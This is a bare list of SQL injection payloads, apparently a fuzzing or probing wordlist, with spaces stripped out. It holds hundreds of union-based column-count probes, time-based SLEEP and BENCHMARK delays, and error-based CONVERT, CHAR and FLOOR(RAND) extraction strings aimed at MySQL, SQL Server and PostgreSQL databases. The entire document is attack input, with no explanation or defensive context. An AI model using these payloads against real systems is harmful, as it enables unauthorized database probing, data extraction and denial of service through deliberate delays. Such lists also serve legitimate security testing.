UNIONSELECT@@VERSION,SLEEP(5),USER(),4#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
UNIONALLSELECTUSER()--
UNIONALLSELECTSLEEP(5)--
UNIONALLSELECTUSER(),SLEEP(5)--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5)--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNIONALLSELECT@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNIONALLSELECTNULL--
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(88)))--
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(88)+CHAR(88)))--
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(88)+CHAR(88)+CHAR(88)))--
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))--
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))--
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))--
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))--
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))--
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))--
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))--
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))--
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))--
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))--
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))--
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))--
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))--
UNIONALLSELECTNULL#
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(88)))#
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(88)+CHAR(88)))#
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(88)+CHAR(88)+CHAR(88)))#
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))#
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))#
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))#
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))#
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))#
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#
UNIONALLSELECTNULL
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(88)))
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(88)+CHAR(88)))
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(88)+CHAR(88)+CHAR(88)))
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))
AND5650=CONVERT(INT,(UNIONALLSELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
AND5650=CONVERT(INT,(SELECTCHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT(CASEWHEN(5650=5650)THENCHAR(49)ELSECHAR(48)END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
AND3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT(CASEWHEN(3516=3516)THEN1ELSE0END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113))ASNUMERIC)
AND(SELECT4523FROM(SELECTCOUNT(*),CONCAT(0x716a7a6a71,(SELECT(ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))xFROMINFORMATION_SCHEMA.CHARACTER_SETSGROUPBYx)a)
UNIONALLSELECTCHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL--
UNIONALLSELECT'INJ'||'ECT'||'XXX'
UNIONALLSELECT'INJ'||'ECT'||'XXX',2
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNIONALLSELECT'INJ'||'ECT'||'XXX'--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
UNIONALLSELECT'INJ'||'ECT'||'XXX'#
UNIONALLSELECT'INJ'||'ECT'||'XXX',2#
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3#
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4#
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5#
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6#
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7#
UNIONALLSELECT'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#
